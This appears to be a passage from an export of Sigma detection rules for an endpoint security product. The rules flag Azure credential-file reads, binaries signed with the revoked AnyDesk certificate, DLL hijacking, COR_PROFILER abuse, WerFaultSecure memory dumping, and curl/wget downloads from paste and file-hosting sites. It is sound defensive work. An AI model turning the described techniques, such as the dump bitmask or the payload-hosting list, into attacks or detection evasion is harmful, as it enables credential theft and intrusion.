'/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_md5:\n Image: '/sbin/md5'\n\n exclusion_az_python:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'org.python.python'\n ProcessParentCommandLine|contains: '/opt/homebrew/bin/az '\n\n exclusion_jq:\n ProcessCommandLine: 'jq -r [.subscriptions[]|select(.isDefault==true)|.name][]|strings /Users/*/.azure/azureProfile.json'\n\n exclusion_claude:\n Image: '/opt/homebrew/Caskroom/claude-code/*/claude'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3309bac8-843b-4a14-91b2-c7af144c1be8",
"rule_name": "Suspicious Access to Azure Configuration File",
"rule_description": "Detects an attempt to read the contents of the Azure configuration file.\nAdversaries may attempt to read an Azure user's configuration file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-12-22",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "331fa9c5-fe30-471e-ba82-51940fe0a2d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071261Z",
"creation_date": "2026-03-23T11:45:34.071263Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071267Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_anydesk_revoked_certificate.yml",
"content": "title: Process Executed Signed with AnyDesk Revoked Certificate\nid: 331fa9c5-fe30-471e-ba82-51940fe0a2d3\ndescription: |\n Detects the execution of a process signed using the AnyDesk revoked certificate.\n This certificate has been revoked after AnyDesk has confirmed that its production systems had been compromised following a cyber-attack in early 2024.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2024/02/20\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '9cd1ddb78ed05282353b20cdfe8fa0a4fb6c1ece'\n\n filter_anydesk:\n OriginalFileName: ''\n Description: 'AnyDesk'\n Company: 'AnyDesk Software GmbH'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n#level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "331fa9c5-fe30-471e-ba82-51940fe0a2d3",
"rule_name": "Process Executed Signed with AnyDesk Revoked Certificate",
"rule_description": "Detects the execution of a process signed using the AnyDesk revoked certificate.\nThis certificate has been revoked after AnyDesk has confirmed that its production systems had been compromised following a cyber-attack in early 2024.\nIt is recommended to investigate the process to determine its legitimacy.\n",
"rule_creation_date": "2024-02-20",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "336d6115-e9ff-4197-b4b0-9fb7e4469941",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097696Z",
"creation_date": "2026-03-23T11:45:34.097698Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097702Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vds.yml",
"content": "title: DLL Hijacking via vds.exe\nid: 336d6115-e9ff-4197-b4b0-9fb7e4469941\ndescription: |\n Detects potential Windows DLL Hijacking via vds.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vds.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\bcd.dll'\n - '\\OSUNINST.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "336d6115-e9ff-4197-b4b0-9fb7e4469941",
"rule_name": "DLL Hijacking via vds.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vds.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "337d171f-6a34-4f7a-8369-d2c7d895322e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619359Z",
"creation_date": "2026-03-23T11:45:34.619361Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619365Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://offsec.almond.consulting/UAC-bypass-dotnet.html",
"https://redcanary.com/blog/cor_profiler-for-persistence/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_clr_profiler_process_environement_variable_powershell.yml",
"content": "title: .NET CLR Profiler Environment Variable Set via PowerShell\nid: 337d171f-6a34-4f7a-8369-d2c7d895322e\ndescription: |\n Detects a PowerShell script block setting the COR_PROFILER or COR_PROFILER_PATH environment variables, which can be used maliciously for privilege escalation.\n COR_PROFILER and COR_PROFILER_PATH are environment variables associated with the .NET runtime profiling tools, used for legitimate debugging and optimization purposes.\n However, attackers may exploit these variables to inject malicious payloads, leading to unintended system access levels.\n It is recommended to investigate the PowerShell script responsible for this action.\nreferences:\n - https://offsec.almond.consulting/UAC-bypass-dotnet.html\n - https://redcanary.com/blog/cor_profiler-for-persistence/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2022/12/23\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.012\n - attack.t1112\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains: '$env:COR_PROFILER'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "337d171f-6a34-4f7a-8369-d2c7d895322e",
"rule_name": ".NET CLR Profiler Environment Variable Set via PowerShell",
"rule_description": "Detects a PowerShell script block setting the COR_PROFILER or COR_PROFILER_PATH environment variables, which can be used maliciously for privilege escalation.\nCOR_PROFILER and COR_PROFILER_PATH are environment variables associated with the .NET runtime profiling tools, used for legitimate debugging and optimization purposes.\nHowever, attackers may exploit these variables to inject malicious payloads, leading to unintended system access levels.\nIt is recommended to investigate the PowerShell script responsible for this action.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "33c950a0-ccc5-4ddb-a153-b5550bf0d290",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097496Z",
"creation_date": "2026-03-23T11:45:34.097498Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097502Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msidb.yml",
"content": "title: DLL Hijacking via MsiDb.exe\nid: 33c950a0-ccc5-4ddb-a153-b5550bf0d290\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiDb.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiDb.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "33c950a0-ccc5-4ddb-a153-b5550bf0d290",
"rule_name": "DLL Hijacking via MsiDb.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiDb.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "33d2f606-2c1d-494f-9455-fba0a918e6eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086132Z",
"creation_date": "2026-03-23T11:45:34.086134Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086139Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html",
"https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html",
"https://attack.mitre.org/techniques/T1003/001/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1003_001_werfaultsecure_bitmask.yml",
"content": "title: Suspicious WerFaultSecure Execution\nid: 33d2f606-2c1d-494f-9455-fba0a918e6eb\ndescription: |\n Detects the execution of WerFaultSecure.exe using a suspicious type bitmask.\n WerFaultSecure is a Microsoft-signed binary for Protected Process error reporting.\n This rule detects a suspicious dump type bitmask usage that has only been observed in WSASS and EDRFreeze hacktools.\n Attackers can abuse this legitimate tool by abusing its capabilities for process memory dumping, bypassing security controls through Living off the Land techniques.\n It is recommended to investigate the parent process to determine the legitimacy of this action and analyze the \"/pid\" argument to determine the criticity of the targeted process.\nreferences:\n - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n - https://attack.mitre.org/techniques/T1003/001/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2025/09/22\nmodified: 2025/10/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WSASS\n - classification.Windows.HackTool.EDRFreeze\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'WerFaultSecure.exe'\n CommandLine|contains: '/type 268310' # MiniDumpWithFullMemory | MiniDumpWithHandleData | MiniDumpScanMemory | MiniDumpWithFullMemoryInfo | MiniDumpWithThreadInfo | MiniDumpWithTokenInformation\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "33d2f606-2c1d-494f-9455-fba0a918e6eb",
"rule_name": "Suspicious WerFaultSecure Execution",
"rule_description": "Detects the execution of WerFaultSecure.exe using a suspicious type bitmask.\nWerFaultSecure is a Microsoft-signed binary for Protected Process error reporting.\nThis rule detects a suspicious dump type bitmask usage that has only been observed in WSASS and EDRFreeze hacktools.\nAttackers can abuse this legitimate tool by abusing its capabilities for process memory dumping, bypassing security controls through Living off the Land techniques.\nIt is recommended to investigate the parent process to determine the legitimacy of this action and analyze the \"/pid\" argument to determine the criticity of the targeted process.\n",
"rule_creation_date": "2025-09-22",
"rule_modified_date": "2025-10-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "33eb8e8a-ac3d-4882-a33c-a06936e7ac1c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592265Z",
"creation_date": "2026-03-23T11:45:34.592268Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592275Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wscript.yml",
"content": "title: DLL Hijacking via wscript.exe\nid: 33eb8e8a-ac3d-4882-a33c-a06936e7ac1c\ndescription: |\n Detects potential Windows DLL Hijacking via wscript.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wscript.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "33eb8e8a-ac3d-4882-a33c-a06936e7ac1c",
"rule_name": "DLL Hijacking via wscript.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wscript.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "33f20b55-a6a9-47fa-8058-df707fd25325",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095386Z",
"creation_date": "2026-03-23T11:45:34.095388Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095392Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_curl_suspicious_link_macos.yml",
"content": "title: File Downloaded via cURL or wget from Suspicious URL (macOS)\nid: 33f20b55-a6a9-47fa-8058-df707fd25325\ndescription: |\n Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/02/13\nmodified: 2025/09/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Wget\n - classification.macOS.LOLBin.Curl\n - classification.macOS.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith:\n - '/wget'\n - '/curl'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'file.io'\n - 'gofile.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'archive.org'\n - 'paste.c-net.org'\n\n exclusion_timesketch:\n CommandLine|contains: ' https://raw.githubusercontent.com/google/'\n\n exclusion_homebrew:\n CommandLine|contains: ' https://raw.githubusercontent.com/Homebrew/'\n\n exclusion_ohmyzsh:\n CommandLine|contains: ' https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh'\n\n exclusion_ruby_brew_update:\n ParentCommandLine|startswith: '/opt/homebrew/library/homebrew/vendor/portable-ruby/current/bin/ruby -w1 --disable=gems,rubyopt /opt/homebrew/library/homebrew/brew.rb upgrade'\n\n exclusion_nvm:\n CommandLine: 'curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v*/install.sh'\n\n exclusion_nix:\n CommandLine|contains: ' https://raw.githubusercontent.com/nixos/experimental-nix-installer/'\n\n 